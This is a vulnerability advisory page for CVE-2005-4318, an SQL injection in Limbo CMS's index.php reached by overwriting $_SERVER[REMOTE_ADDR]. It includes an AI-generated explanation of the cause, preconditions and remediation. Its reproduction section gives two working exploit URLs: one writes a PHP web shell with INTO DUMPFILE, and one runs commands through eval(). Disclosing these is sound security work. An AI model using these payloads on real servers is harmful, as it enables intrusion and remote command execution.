VYPR
← All advisories
Unrated severityNVD Advisory· Published Dec 17, 2005· Updated Jun 16, 2026

CVE-2005-4318

CVE-2005-4318

Description

SQL injection vulnerability in index.php in Limbo CMS 1.0.4.2 and earlier, with register_globals off, allows remote attackers to execute arbitrary SQL commands via the _SERVER[REMOTE_ADDR] parameter, which modifies the underlying $_SERVER variable.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Affected products

1

Patches

Vulnerability mechanics

Root cause

"Missing input validation allows user-supplied query parameters to overwrite the $_SERVER superglobal array, and the unsanitized $_SERVER[REMOTE_ADDR] value is used in SQL queries and eval() calls."

Attack vector

An attacker sends an HTTP request to the Limbo CMS `index.php` or `index2.php` with query parameters `_SERVER[]` and `_SERVER[REMOTE_ADDR]` set to a malicious payload. Because `register_globals` is off, PHP allows the attacker to overwrite the `$_SERVER` superglobal array via the query string. The injected `_SERVER[REMOTE_ADDR]` value is not sanitized before being used in a SQL query, enabling blind SQL injection [ref_id=1]. The researcher demonstrates that this works regardless of `magic_quotes_gpc` settings because the `strip_magic_quotes()` function in `includes/initglobal.php` only processes `$_GET` and `$_POST`, not `$_SERVER` [ref_id=1]. The attack requires no authentication and only needs network access to the target web server.

Affected code

The vulnerability lies in how Limbo CMS handles the `$_SERVER` superglobal array. The file `includes/initglobal.php` strips magic quotes from `$_GET` and `$_POST` but does not protect the `$_SERVER` array from being overwritten via query string parameters like `_SERVER[]` and `_SERVER[REMOTE_ADDR]`. The unsanitized `$_SERVER[REMOTE_ADDR]` value is then used directly in SQL queries (e.g., in the simple stats module) and in an `eval()` call within `classes/adodbt/read_table.php` at line 136-140 [ref_id=1].

What the fix does

No patch is included in the bundle. The advisory [ref_id=1] does not describe a vendor-supplied fix. Based on the root cause, remediation would require preventing user-supplied input from overwriting the `$_SERVER` superglobal array, and sanitizing or validating any `$_SERVER` values (such as `REMOTE_ADDR`) before using them in SQL queries or `eval()` calls. The advisory notes that the `strip_magic_quotes()` function in `includes/initglobal.php` only handles `$_GET` and `$_POST`, leaving `$_SERVER` unprotected — a complete fix would need to either block `_SERVER[]` from being accepted as a query parameter or add proper input validation for all `$_SERVER` values used in sensitive operations.

Preconditions

  • configPHP register_globals must be Off
  • configLimbo CMS must be configured to use MySQL for data storage (not flat files)
  • networkAttacker must have network access to the target web server
  • authNo authentication required

Reproduction

The following proof-of-concept URL demonstrates blind SQL injection via `_SERVER[REMOTE_ADDR]` overwrite [ref_id=1]:

``` http://[target]/[path]/index.php?_SERVER[]&_SERVER[REMOTE_ADDR]=999'UNION SELECT null,'<?php system($_G','ET[cmd]);?>' INTO DUMPFILE '[full_application_path]shell.php' FROM lm_simple_stats/*&option=weblinks&Itemid=999/* ```

For remote command execution via `eval()` injection, the researcher provides this URL [ref_id=1]:

``` http://[target]/[path_to_limbo]/index2.php?cmd=dir&_SERVER[]=&_SERVER[REMOTE_ADDR]='.system($_GET[cmd]).die('').'&option=wrapper&module[module]=1 ```

A full PHP exploit script is included in the reference write-up [ref_id=1] that automates the attack through an HTTP request with the crafted `_SERVER[]` and `_SERVER[REMOTE_ADDR]` parameters.

Generated on May 26, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

8

News mentions

0

No linked articles in our index yet.